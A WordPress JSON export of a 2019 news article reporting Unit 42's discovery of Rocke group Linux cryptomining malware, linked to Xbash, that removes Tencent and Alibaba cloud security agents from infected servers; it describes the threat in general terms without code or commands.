{"id":37370,"date":"2019-01-18T11:06:19","date_gmt":"2019-01-18T11:06:19","guid":{"rendered":"http:\/\/icloud.pe\/blog\/?guid=75bcdac0ab611e6d9cc715b8cdff7135"},"modified":"2019-01-18T11:06:19","modified_gmt":"2019-01-18T11:06:19","slug":"cloud-security-products-uninstalled-by-mutating-malware","status":"publish","type":"post","link":"https:\/\/icloud.pe\/blog\/cloud-security-products-uninstalled-by-mutating-malware\/","title":{"rendered":"Cloud security products uninstalled by mutating malware"},"content":{"rendered":"<p><span class=\"field field-name-field-author field-type-node-reference field-label-hidden\"><br \/>\n      <span class=\"field-item even\"><a href=\"https:\/\/www.cloudpro.co.uk\/authors\/connor-jones\">Connor Jones<\/a><\/span><br \/>\n  <\/span><\/p>\n<div class=\"field field-name-field-published-date field-type-datetime field-label-hidden\">\n<div class=\"field-items\">\n<div class=\"field-item even\"><span class=\"date-display-single\">18 Jan, 2019<\/span><\/div>\n<\/p><\/div>\n<\/div>\n<p class=\"short-teaser\">\n<a href=\"https:\/\/www.cloudpro.co.uk\/\" title=\"\" class=\"combined-link\"><\/a><\/p>\n<div class=\"field field-name-body\">\n<p> Unit 42, the global cyber threat intelligence arm of Palo Alto Networks, has discovered new forms of a Linux coin mining malware originally used by the Rocke group which attacks Linux servers, aka a large portion of all servers in the world.<\/p>\n<p>The malware which is believed to be related to the Xbash malware detected in September 2018, will infect a <a href=\"https:\/\/www.cloudpro.co.uk\/it-infrastructure\/cloud-storage\/7885\/unsecured-server-reveals-years-worth-of-fbi-investigations\" >server<\/a> and then mutate, downloading new code which allows it to assume administrative control and delete cloud services installed on them.<\/p>\n<p>The security products weren&#8217;t compromised specifically, instead, the threat actor was able to simply remove them from the server altogether in the same way a legitimate system administrator would be able to.<\/p>\n<p>The samples analysed by Unit 42 targeted cloud services provided by two of China&#8217;s leading cloud providers: Tencent Cloud and <a href=\"https:\/\/www.cloudpro.co.uk\/alibaba\" >Alibaba Cloud<\/a> (Aliyun). It&#8217;s also <a href=\"https:\/\/unit42.paloaltonetworks.com\/malware-used-by-rocke-group-evolves-to-evade-detection-by-cloud-security-products\/\" >believed by the threat intelligence team<\/a> that the analysed samples are the first form of malware that can target and delete cloud services from servers.<\/p>\n<p>The threat isn&#8217;t just presented to hosts of Linux servers, Cloud Workload Protection Platforms (CWPP), which are essentially built-in security services into cloud products tailored to stop malware intrusions, are also under threat.<\/p>\n<p>The threat is worth taking seriously, considering Tencent Cloud and Alibaba Cloud (Aliyun) both have CWPPs included with their products which means they&#8217;re not doing enough to mitigate attacks, evidently with the latest one which attempted to mine Monero using Linux hardware.<\/p>\n<p>The Xbash family of <a href=\"https:\/\/www.cloudpro.co.uk\/it-infrastructure\/security\/7436\/its-time-to-wake-up-to-the-cloud-malware-threat\" >malware<\/a> which was first discovered in Septemeber 2018 is devastating, with analysed samples infecting servers in worm-like fashion and destroying data on the server while posing as ransomware. Researchers found no evidence in the attack code that a provision was in place whereby data could be restored following the ransom&#8217;s payment.<\/p>\n<p>Linux is more prevalent than one might think, Microsoft Azure is now predominantly run on Linux servers &#8211; it&#8217;s not just the Chinese cloud environments being hosted via <a href=\"https:\/\/www.cloudpro.co.uk\/leadership\/cloud-essentials\/7266\/barcelona-to-ditch-microsoft-in-favour-of-open-source-linux\" >Linux<\/a>, it&#8217;s likely that your business is running at least one cloud service on a Linux server too. <\/p>\n<\/p><\/div>\n","protected":false},"excerpt":{"rendered":"<p>      Connor Jones<\/p>\n<p>        18 Jan, 2019    <\/p>\n<p>       Unit 42, the global cyber threat intelligence arm of Palo Alto Networks, has discovered new forms of a Linux coin mining malware originally used by the Rocke group which attacks Linux servers, &#8230;<\/p>\n","protected":false},"author":507,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[],"tags":[],"class_list":["post-37370","post","type-post","status-publish","format-standard","hentry"],"_links":{"self":[{"href":"https:\/\/icloud.pe\/blog\/wp-json\/wp\/v2\/posts\/37370","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/icloud.pe\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/icloud.pe\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/icloud.pe\/blog\/wp-json\/wp\/v2\/users\/507"}],"replies":[{"embeddable":true,"href":"https:\/\/icloud.pe\/blog\/wp-json\/wp\/v2\/comments?post=37370"}],"version-history":[{"count":1,"href":"https:\/\/icloud.pe\/blog\/wp-json\/wp\/v2\/posts\/37370\/revisions"}],"predecessor-version":[{"id":37371,"href":"https:\/\/icloud.pe\/blog\/wp-json\/wp\/v2\/posts\/37370\/revisions\/37371"}],"wp:attachment":[{"href":"https:\/\/icloud.pe\/blog\/wp-json\/wp\/v2\/media?parent=37370"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/icloud.pe\/blog\/wp-json\/wp\/v2\/categories?post=37370"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/icloud.pe\/blog\/wp-json\/wp\/v2\/tags?post=37370"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}